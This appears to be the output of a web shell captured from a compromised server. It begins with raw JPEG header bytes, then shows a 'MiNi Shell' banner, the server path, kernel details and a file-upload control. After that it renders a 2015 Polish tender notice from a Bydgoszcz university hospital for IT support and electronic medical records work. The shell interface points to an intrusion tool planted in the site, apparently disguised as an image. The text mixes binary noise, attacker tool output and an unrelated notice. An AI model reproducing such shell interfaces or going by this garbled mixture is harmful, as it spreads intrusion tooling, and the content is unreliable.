JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150915/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150915/240242-N-2015.html

<p class="kh_header"><b>Bydgoszcz: Usługi doradcze w zakresie wdrażania Elektronicznej Dokumentacji Medycznej oraz zapewnienie usług pomocy technicznej systemu informatycznego Szpitala Uniwersyteckiego nr 1 im. dr. A. Jurasza w Bydgoszczy</b><br>
<b>Numer ogłoszenia: 240242 - 2015; data zamieszczenia: 15.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Uniwersytecki nr 1 im. dr. A. Jurasza w Bydgoszczy , ul. M. Skłodowskiej-Curie 9, 85-094 Bydgoszcz, woj. kujawsko-pomorskie, tel. 52 5854304, faks 52 5854076.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jurasza.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi doradcze w zakresie wdrażania Elektronicznej Dokumentacji Medycznej oraz zapewnienie usług pomocy technicznej systemu informatycznego Szpitala Uniwersyteckiego nr 1 im. dr. A. Jurasza w Bydgoszczy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.1 Przedmiotem zamówienia są usługi doradcze w zakresie wdrażania Elektronicznej Dokumentacji Medycznej oraz zapewnienie usług pomocy technicznej systemu informatycznego Szpitala Uniwersyteckiego nr 1 im. dr. A. Jurasza w Bydgoszczy.2.2 Zamawiający dysponuje systemem informatycznym wymagającym:2.2.1 dostosowania do aktualnych wymagań przepisów prawnych, potrzeb wewnętrznych Szpitala oraz wymagań procesu akredytacyjnego w zakresie Elektronicznej Dokumentacji Medycznej (szczegółowy opis poniżej):2.2.2 zapewnienia nieprzerwanego sprawnego funkcjonowania systemu informatycznego SU nr 1 (szczegółowy opis poniżej):2.2.Usługi w zakresie Elektronicznej Dokumentacji Medycznej. A.Zakres projektu:W okresie realizacji zamówienia Zamawiający planuje opracowanie i uruchomienie oprogramowania i rozwiązań technicznych, stanowiącego uzupełnienie i modyfikację istniejącego systemu, w zakresie Elektronicznej Dokumentacji Medycznej. Zakres usługi objętej przedmiotem zamówienia obejmuje: wsparcie techniczne i nadzór nad pracą zespołu programistów Zamawiającego w procesie projektowania i wdrażania modyfikacji systemu informatycznego Szpitala Uniwersyteckiego nr 1 w zakresie prowadzenia dokumentacji medycznej pacjentów w postaci elektronicznej zgodnie z obowiązującymi przepisami prawa, wymogami akredytacyjnymi oraz potrzebami wewnętrznymi Szpitala stworzenie i uruchomienie modułu do analizy danych medycznych, finansowych i organizacyjnych zgromadzonych w bazie danych systemu OpenCare B.Założenia projektowe: system oparty będzie o bazę danych PostgreSQL 9.1 lub wyższej język programowania JAVA Moduł do analizy danych medycznych, finansowych i organizacyjnych zgromadzonych w bazie danych systemu OpenCare aplikacja służąca do  generowania w dowolnym układzie raportów z dostępnych zdefiniowanych atrybutów oraz filtrów Moduł analizujący dane medyczne, finansowe i organizacyjne zgromadzone w bazie danych systemu OpenCare. System musi umożliwiać:1.Samodzielne budowanie przez użytkowników raportów i analiz z dostępnych atrybutów z możliwością zapisu definicji raportu do późniejszego wykorzystaniaa) Zdefiniowanie raportu przez wybór następujących elementów, atrybutów lub ich dowolnych kombinacji: hospitalizacje (czas trwania, daty rozpoczęcia, zakończenia, tryby przyjęcia i wypisu), pobyty (czas trwania, daty rozpoczęcia i zakończenia, jednostki organizacyjne), wizyty (daty rozpoczęcia i zakończenia, jednostki organizacyjne), pacjenci (wiek, płeć, pochodzenie, zgon, dane osobowe, dane teleadresowe), pracownicy (lekarz przyjmujący, wypisujący, sprawujący opiekę nad pacjentem, operujący), rozpoznania medyczne, procedury medyczne, rodzaj rozpoznania, świadczenia rozliczeniowe, zabiegi operacyjne, zdarzenia niepożądane, powikłania b)Każdy z tworzonych przez użytkownika raportów powinien mieć możliwość filtrowania danych wynikowych przez wybrane kryteria lub dowolne ich kombinacje ze zbioru atrybutów: m.in. hospitalizacje (czas trwania, daty rozpoczęcia, data zakończenia, tryby przyjęcia i wypisu), pobyty (czas trwania, daty rozpoczęcia i zakończenia, jednostki organizacyjne), wizyty (daty rozpoczęcia i zakończenia, jednostki organizacyjne), pacjenci (wiek, płeć, pochodzenie, dane osobowe, zgony), pracownicy (lekarz przyjmujący, wypisujący, sprawujący opiekę nad pacjentem, operujący), rozpoznania medyczne, procedury medyczne, świadczenia rozliczeniowe, zabiegi operacyjne, zdarzenia niepożądane, powikłania 2.System powinien umożliwiać tworzenie nowych i modyfikację istniejących definicji elementów, atrybutów raportów i filtrów przez administratora.3.Wybór sposobu agregacji i prezentacji danych w formie tabelarycznej i graficznej (wykres) 4.W przypadku raportu bez agregacji dotyczącego  np.: wizyt, hospitalizacji oraz pobytów zawierających dane pacjenta, możliwość w zależności od posiadanych uprawnień uruchomienie okna dokumentacji medycznej danego pacjenta. 5.Eksport danych zdefiniowanego raportu do formatu MS EXCEL,CSV 6.Import zdefiniowanych w Szpitalu raportów dostępnych w Systemie Informowania Kierownictwa (zapytania SQL aktualnych raportów zostaną udostępnione wykonawcy) a)Raport zabiegów operacyjnych (dane identyfikacyjne pacjenta, jednostka organizacyjna, tryb przyjęcia i wypisu ze szpitala, data przyjęcia i wypisu ze szpitala, liczba osobodni, rozpoznania medyczne, procedury medyczne, data zabiegu, procedury zabiegu, tryb zabiegu, personel); filtrowanie wg zakresu dat i jednostki organizacyjnej b)Lista rehospitalizacji (dane identyfikacyjne pacjenta, jednostki organizacyjne, na których pacjent przebywał, tryb przyjęcia i wypisu ze szpitala, data przyjęcia i wypisu ze szpitala, lekarz przyjmujący i wypisujący, rozpoznania medyczne, procedury medyczne, grupa JGP; filtrowanie wg zakresu dat i jednostki organizacyjnejc)Analiza skuteczności prowadzonej profilaktyki choroby zatorowo zakrzepowej (liczba pacjentów, u których podjęto i u których nie podjęto profilaktyki; zestawienie rodzajów powikłań i objawów niepożądanych); filtrowanie wg zakresu dat i jednostki organizacyjnej d)Stan realizacji umów z NFZ (nazwa kontraktu, miesiąc i rok rozliczeniowy, limit na dany okres, wartość świadczeń punktowa i wartościowa z podziałem na świadczenia niewysłane, błędne, w trakcie weryfikacji NFZ, potwierdzone przez NFZ i rozliczone); filtrowanie wg roku rozliczeniowego e)Raport kosztów pacjentów (dane identyfikacyjne pacjenta, rozpoznania, procedury, koszty osobodnia, koszty mikrobiologiczne, laboratoryjne, radiologiczne, koszty leków i materiałów, koszt usług z fakturowania wewnętrznego); filtrowanie wg zakresu dat i jednostki organizacyjnej 7.Autoryzację użytkowników w oparciu o protokół LDAP 8.Kontrolę dostępu do danych zgodną z polityką bezpieczeństwa Szpitala, definiowaną i zarządzaną z poziomu modułu systemu OpenCare 9.Anonimizację danych osobowych pacjentów, do których zalogowana osoba nie posiada uprawnień dostępu, celem uzyskania danych statystycznych C.Główne założenia funkcjonalne dotyczące prowadzenia dokumentacji medycznej w postaci elektronicznej: Dokumentacja medyczna powinna być zgodna z założeniami zawartymi w  Programie Akredytacji Szpitali Ministerstwa Zdrowia oraz przepisami z rozporządzenia Ministra Zdrowia w sprawie rodzajów i zakresu dokumentacji medycznej oraz sposobu jej przetwarzania D.Zakres obowiązków (zadania) Usługodawcy :a)przeprowadzenie analizy istniejącego systemu OpenCare w wyniku, której określone zostaną wymagania minimalne w zakresie jego przystosowania do współpracy z nowym modułem oraz modyfikacji zapewniających zgodność prowadzonej dokumentacji medycznej w formie elektronicznej z obowiązującymi przepisami prawa, wymogami akredytacyjnymi oraz potrzebami wewnętrznymi Szpitala b)bieżące wsparcie techniczne w formie konsultacji, zapytań drogą elektroniczną do wykonawcy  w trakcie tworzenia nowych modułów lub modyfikacji istniejącego oprogramowania w kontekście prawidłowego  prowadzenia w formie elektronicznej dokumentacji medycznej zgodnie z zapisami ustaw i rozporządzeń ministra zdrowia oraz programu akredytacji, w szczególności: wsparcie techniczne w implementacji obsługi podpisu elektronicznego w języku programowania Java, wsparcie techniczne odnośnie implementacji generowania dokumentacji medycznej w postaci pdf, xml, kontrolowania czy aktualnie użytkowany system w szpitalu jest zgodny z obowiązującymi wymogami NFZ oraz Ministerstwa Zdrowia Wykonawca zobowiązany jest do udzielenia  odpowiedzi na zgłoszenia zamawiającego w czasie nie dłuższym niż 1 dzień roboczy c)implementacja aktualizacji wymaganych przepisami prawa oraz wymogami Narodowego Funduszu Zdrowia oraz naprawa wykrytych błędów w systemie w ciągu maksymalnie 24 godzin od chwili zgłoszenia (zgodnie z deklaracją złożoną w ofercie przetargowej) przez Zamawiającego lub 7 dni roboczych od wejścia w życie nowych przepisów Ministerstwa Zdrowia lub zarządzeń NFZ dla:funkcji wyznaczania grupy JGP dla hospitalizacji, ambulatorium i  rehabilitacji, procesu generowania, wczytywania i walidacji komunikatów XML w komunikacji z NFZ, wczytywania umów z NFZ pełnego procesu  rozliczeń wykonanych świadczeń do NFZ w otwartym formacie danych d)aktualizacja lub opracowanie i implementacja nowych niezbędnych raportów statystycznych wymaganych przez NFZ lub Ministerstwo Zdrowia zgodnie z obowiązujących przepisami e)pomoc techniczna w zakresie systemu OpenCare: moduł rozliczenia f)wsparcie techniczne w konfiguracji i optymalizacji pracy bazy danych PostgreSQL w wersji 9.1 lub wyższej g)konsultacje w celu wyjaśniania niejasności i problemów wynikających z bieżącej eksploatacji systemu Ruch Wykonawca zobowiązany będzie prowadzić rejestr zgłoszeń dokonanych przez zamawiającego oraz podjętych czynności w celu rozwiązania zgłoszenia zgodnie z załącznikiem przedstawionym w umowie.2.2.2Zapewnienie usług pomocy technicznej systemu informatycznego  SU nr 1,A.Przedmiot zamówienia obejmuje: zapewnienie usług telefonicznej pomocy technicznej systemu informatycznego Szpitala w godzinach 15.00 do 7:25 oraz całodobowo w dni wolne od pracy w przypadku awarii niemożliwej do usunięcia zdalnie, przyjazd serwisanta na miejsce w ciągu 30 minut i usunięcie awarii w godzinach 15.00 do 7:25 oraz całodobowo w dni wolne od pracy nie mniej niż trzech serwisantów pomoc techniczna w zakresie systemu Windows Serwer (od 2003): Active Directory, Serwer plików, Serwer aplikacji Serwer DHCP, SITE, Polisy, Filtry WMI, Uprawnienia,Usługi terminalowe pomoc techniczna w zakresie baz MS SQL, Oracle 10g, PostgreSQL (uprawnienia, użytkowników, backupów, ciągłości działania) pomoc techniczna w zakresie systemów stacji roboczych MS Windows XP, MS Windows 7 pomoc techniczna w zakresie konfiguracji Routera firmy Dryatek, Fortinet pomoc techniczna w zakresie systemu Eskulap: Ruch chorych, Poradnia, Apteka, Administracja, Dokumentacja medyczna, Kolejki,Pomoc techniczna w zakresie systemu OpenCare:Ruch chorych, Poradnia, Apteczka Oddziałowa, Administracja, Dokumentacja medycznaKolejki, pomoc techniczna w zakresie systemu iCENTRUM firmy MARCEL, pomoc techniczna w zakresie systemu ProMIC, obsługa i naprawa drobnych usterek stacji komputerowych, drukarek, okablowania sieci, pomoc techniczna w zakresie sieci LAN, pomoc techniczna w zakresie dostępu do usług w sieci Internet, pomoc techniczna w zakresie dostępu i obsługi aplikacji NFZ, pomoc techniczna w zakresie obsługi hostingu poczty zewnętrznej i wewnętrznej, pomoc techniczna w zakresie serwerów Blade Primargy oraz Storage Eternus, Wykonawca zobowiązany będzie prowadzić rejestr zgłoszeń dokonanych przez zamawiającego oraz podjętych czynności w celu rozwiązania zgłoszenia zgodnie z załącznikiem przedstawionym w umowie.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 72.22.40.00-1, 72.20.00.00-7, 72.00.00.00-5, 72.22.41.00-2, 72.25.31.00-4, 72.25.32.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 9.1	Zamawiający wymaga wniesienia wadium przed upływem terminu (łącznie z podaną godziną) składania ofert wskazanego w pkt. 12.1 SIWZ. (art. 45 ustawy) w wysokości: 1500,00 złotych
w jednej z niżej wymienionych form:
a) 	pieniądzu - przelew na rachunek bankowy Zamawiającego w WBK S.A. nr rachunku: 64-1500-1360-1213-6008-5200-0000 na dowodzie wpłaty należy zaznaczyć Przetarg na usługi doradcze w zakresie wdrażania Elektronicznej Dokumentacji Medycznej oraz zapewnienie usług pomocy technicznej systemu informatycznego Szpitala Uniwersyteckiego nr 1 im. dr. A. Jurasza w Bydgoszczy. oraz w tytule przelewu podać nr NIP,
b) 	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) 	gwarancjach bankowych,
d) 	gwarancjach ubezpieczeniowych,
e) 	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r., Nr 42, poz. 275).
9.2		W przypadku wnoszenia wadium w formie pieniężnej Zamawiający zaleca, aby oryginał lub kopia (przygotowana z zastosowaniem postanowień pkt. 11.7 SIWZ) dowodu wpłaty dołączony został do oferty. W każdym przypadku oryginał lub kopia (przygotowana z zastosowaniem postanowień pkt. 11.7 SIWZ) dowodu wpłaty nie może być doręczony Zamawiającemu później niż do upływu terminu wskazanego w pkt. 12.1 SIWZ. W przypadku wnoszenia wadium w formie pieniężnej wniesienie w terminie nastąpi wówczas, gdy wskazany powyżej rachunek bankowy Zamawiającego zostanie uznany kwotą wadium przed upływem terminu (łącznie z podana godziną), o którym mowa w pkt. 12.1 SIWZ.
9.3		W przypadku wnoszenia wadium w formie niepieniężnej beneficjentem musi być Zamawiający. Zamawiający zaleca, aby kopia dokumentu dołączona została do oferty. Oryginał dokumentu nie może być doręczony Zamawiającemu później niż do upływu terminu (łącznie z godziną), o którym mowa w pkt. 12.1 SIWZ. Przez doręczenie uznaje się złożenie oryginału dokumentu w kasie siedziby Zamawiającego budynek A, czynnej od poniedziałku do piątku z wyjątkiem środy (chyba, że 10 dzień danego miesiąca przypadać będzie w środę to kasa będzie czynna w tym właśnie dniu, w tej sytuacji następny dzień czyli czwartek będzie dniem, w którym kasa będzie nieczynna) w godzinach 10:00-13:00, z zastrzeżeniem wskazanego w zdaniu poprzednim terminu (łącznie z godziną) przyjęcia dokumentu w dniu składania ofert.
9.4		W przypadku wnoszenia wadium w formie gwarancji bankowej lub ubezpieczeniowej Zamawiający wymaga, aby wystawiona gwarancja była bezwarunkowa, nieodwołalna i płatna na pierwsze żądanie Zamawiającego.
9.5		Wykonawca, który wycofał swoją ofertę, a zabezpieczył ją wadium, powinien wystąpić do Zamawiającego na piśmie o dokonanie zwrotu wadium w formie i wysokości, w której je wniósł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przepisy prawa nie nakładają obowiązku posiadania uprawnień do wykonywania  działalności związanej z niniejszym zamówieniem, dlatego też Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże iż w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował należycie zamówienia tj. wykonał lub wykonuje należycie co najmniej jedną maksymalnie trzy usługi w zakresie podobnym do przedmiotowego o łącznej wartości nie mniejszej niż 150 000,00 zł z wskazaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że te usługi  zostały wykonane lub są wykonywane należycie.

	Pod pojęciem usług podobnych do przedmiotowych Zamawiający rozumie usługi związane z dostosowaniem systemu informatycznego do aktualnych wymagań przepisów prawnych oraz wymagań procesu akredytacyjnego w zakresie Elektronicznej Dokumentacji Medycznej oraz usług związane z zapewnieniem nieprzerwanego, sprawnego funkcjonowania systemu informatycznego  w podmiotach leczniczych o wielkości zatrudnienia min. 1800 osób, ilości łóżek nie mniej niż 800 szt.

	Powyższe wymagania mają na celu potwierdzenie  posiadania doświadczenia w zakresie podobnych usług oraz posiadania niezbędnej wiedzy na temat działania systemu rozliczeń Szpitala z Narodowym Funduszem Zdrowia.

* Dowodami, o których mowa, są:
1)	poświadczenia, z tym, że w odniesieniu do nadal wykonywanych dostaw okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert
2)	oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze, wykonawca nie jest w stanie uzyskać poświadczenia o którym mowa w pkt. 1 powyżej.

UWAGA:
- 	w przypadku gdy Zamawiający jest podmiotem, na rzecz którego dostawy wskazane w wykazie, o którym mowa w pkt.7.1.b) SIWZ, zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów*,

Opis sposobu dokonywania oceny spełnienia tego warunku:
Ocena spełnienia postawionego powyżej warunku dokonywana będzie w oparciu o informacje zawarte w oświadczeniu i  dokumencie wyszczególnionych w pkt. 7.1. a) i b) SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony jeśli Wykonawca przedstawi wykaz 4 osób w tym co jednej osoby mającą doświadczenie (min. 5 lat) w koordynowaniu (analiza, projekt, wykonanie i wdrożenie) pracy nad projektami informatycznymi w podmiotach leczniczych o wielkości zatrudnienia min. 1800 osób, ilości łóżek nie mniej niż 800 szt., posiadającym wiedzę w przedmiocie zamówienia, określonym w pkt. 2.2.1 SIWZ., oraz najmniej trzema osobami (serwisantami) posiadającymi min. 2 letnie doświadczenie oraz wiedzę w wykonywaniu usług pomocy technicznej w zakresie wymienionym w pkt. 2.2.2 SIWZ., które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia oraz informacją o podstawie do dysponowania tymi osobami.

Opis sposobu dokonywania oceny spełnienia tego warunku:
Ocena spełnienia postawionego powyżej warunku dokonywana będzie w oparciu o informacje zawarte w oświadczeniu i  dokumencie wyszczególnionych w pkt. 7.1. a) i c) SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
